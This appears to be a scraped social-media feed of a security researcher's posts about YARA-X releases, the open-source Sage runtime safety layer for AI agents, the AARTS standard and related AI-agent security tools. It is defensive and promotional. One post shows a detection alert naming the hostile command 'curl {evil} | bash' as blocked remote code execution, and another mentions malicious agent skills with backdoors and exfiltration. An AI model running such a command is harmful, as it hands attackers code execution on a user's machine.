Tomáš Ďuriš

We're excited to announce that the latest version of YARA-X now includes the long-awaited error-resilient parser, a feature we've proudly contributed to. This development enhances YARA-X's robustness and reliability.

"Tool call firewalls" is a great way to put it. Vaclav Belak from our @GenThreatLabs team and @joshavant drove this into @openclaw. We needed async approval hooks for Sage (our open-source agent safety layer), so Vaclav contributed them directly upstream. #AgentSafety #OpenClaw #SageADR github.com/gendigitalinc/…

@gemsnper @AISecHub For the real-time protection please check-out Sage: x.com/i/status/20244…

@AISecHub does claudit-sec also offer capabilities for real-time monitoring or just static audits? continuous updates on AI-driven risks could be a game changer in this space.

claudit-sec - github.com/HarmonicSecuri… Security audit tool for Claude Desktop and Claude Code on macOS single-command visibility into MCP servers, extensions, plugins, connectors, scheduled tasks, and permissions. Claude Desktop introduces a new class of endpoint risk: AI agents with autonomous execution, persistent scheduled tasks, MCP server integrations, browser-control extensions, and OAuth-authenticated connectors to external services. Most of this configuration lives in JSON files scattered across multiple directories with no centralised visibility. #ClaudeSecurity #MCPServerSecurity #ClaudeDesktop #AISecurity #EndpointSecurity #AISecurity

How well your AI agent is protected heavily depends on which platform it runs on. We found this out building Sage 🛡️, an open-source runtime security layer for AI agents. Integrating across Claude Code, Cursor, OpenClaw... each platform exposes a different subset of security-relevant events. A few report properly, some partially, the rest not at all. No amount of better rules can fix that. You need a contract between agent platforms and security tools. What gets reported, when, and how decisions are enforced. That contract didn't exist. So we wrote one at @GenThreatLabs. Today we published AARTS, the AI Agent Runtime Safety Standard. Open spec, vendor-neutral, designed so any security engine can plug into any compliant host. Not tied to Sage. Spec is open. We need platform builders and security vendors to collaborate on it and adopt it to make it real. 🤝 @bcherny @steipete @OpenAI @Copilot gendigital.com/blog/news/comp…

@NetworkChuck What do you think of Sage? It is capable of much more 🛡️ x.com/i/status/20260…

Want to know if your OpenClaw skills are actually malicious? 👀 Bitdefender Labs found that 17% of skills analyzed in early February 2026 are showing malicious behavior. We’re talking backdoors and data exfiltration hidden in plain sight! I’m using the Bitdefender AI Skills Checker to scan my skills before I even think about installing them. It’s a free tool that gives you a full risk assessment report so you know exactly what’s under the hood ✅ Check your skills for FREE here: bitdefend.me/AICheckerNC @Bitdefender #TrustedAlways #Ad

@steipete When it comes to the safety, check this out: x.com/i/status/20260… It works nicely with OpenClaw - give it a try! 🛡️

Since I spend my night again sifting through security advisories, folks, security researches, slop clankers, PLEASE - read docs.openclaw.ai/gateway/securi… and github.com/openclaw/openc… The security model of OpenClaw is that it's your PERSONAL assistant (one user - 1...many agents). IT IS NOT A BUS. If you want to have multiple users that are adversarial to each other, use on VPS per gateway and user. (or Mac Minis, if you like spending money) I closed like 20 reports today that try to force it into something it's was never designed for and that would just add loads of needless complexity and would introduce unnecessary bugs that won't benefit the wast majority of users.

🛡️ 𝗦𝗮𝗴𝗲 𝗯𝘆 𝗚𝗲𝗻 𝗗𝗶𝗴𝗶𝘁𝗮𝗹: 𝗧𝗵𝗿𝗲𝗮𝘁 𝗕𝗹𝗼𝗰𝗸𝗲𝗱 🛡️ 🚨━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 🚨 𝗧𝗵𝗿𝗲𝗮𝘁 Remote code execution via curl pipe to shell 𝗦𝗲𝘃𝗲𝗿𝗶𝘁𝘆 CRITICAL 𝗔𝗿𝘁𝗶𝗳𝗮𝗰𝘁 curl {evil} | bash AI agents do crazy things - with full access to your machine, data, sometimes even finance. We built an open-source security solution that sits inside the agent and checks every action before it runs. Open-sourced under the Apache 2.0 license 200+ detection rules and heuristics under the Detection-Rule-License (DRL) by @cyb3rops Support for @claudeai (@bcherny), @cursor_ai, @openclaw... Try it. Break it. Tell us what's missing. github.com/avast/sage

@DanielLockyer You can try: github.com/avast/sage

... oh

Take a look at what we have built 🛡️🦾

Another Gen contribution to YARA-X upstream thanks to Albert Tikaiev (github.com/prosperritty): A YARA-X Language Server integrated directly into the YARA-X ecosystem, built on the error-tolerant parser started by Tomas Duris (github.com/TommYDeeee). It all started in 2017 with yaramod (github.com/avast/yaramod), an alternative YARA parser we built for linters and static analysis tools. Back then, we didn't even know what a language server was. After several years of iteration, in 2022 we released the first #YARA language server (YLS) on our GitHub (github.com/avast/yls), made by @KastakMatej, though it lived outside the YARA ecosystem. With YARA-X, we saw an opportunity for a unified ecosystem containing all the tooling we've been building and open-sourcing over the years. After adding the error-tolerant parser built on rowan in 2024, the language server was the natural next step. We're grateful @plusvic was open to the idea, accepted it upstream, and even improved it. This isn't our final stop. We'll continue helping build an even stronger YARA-X toolkit. Stay tuned!

YARA-X is now stable! virustotal.github.io/yara-x/blog/ya…

YARA-X 0.15.0 is out! github.com/VirusTotal/yar…

Our team at @GenThreatLabs dug deep into the evolving threat landscape. 🤖 AI-powered scams, 📈 a surge in ransomware, 🔥 billions of attacks blocked, and much, much more. Read the full Gen Q4/2024 Threat Report here: gendigital.com/blog/insights/… #GenThreatReport

Wow, amazing work by my @proofpoint homies! Check out what @GenDigitalInc and I were able to contribute to and push all the way forward 👊

@jacoblatonis @duristomas67 video is here for those that wanna hear us yap: youtube.com/live/Nm0zLW8Rh…

Jacob (@jacoblatonis) & Greg (@greglesnewich) from @Proofpoint talked at #OBTS about the very exciting release of Yara-X &how they built a Macho parser in Rust!! Shoutout to @GenThreatLabs / @ @duristomas67 for their work too! Now in prod for @virustotal! virustotal.github.io/yara-x/blog/vi…

VirusTotal is already using YARA-X in production. virustotal.github.io/yara-x/blog/vi…

Proud of the work we’re doing and kudos to @LadislavZezula! 💪 Check out the free decryption tool for the #Mallox / #TargetCompany #ransomware that hit in '23-'24. Details & download link here: gendigital.com/blog/news/inno… #DontPayUp #GenThreatLabs

YARA-X 0.10.0 has been released. github.com/VirusTotal/yar…

YARA-X 0.9.0 has been released. github.com/VirusTotal/yar…

@wxs Always glad to contribute 😎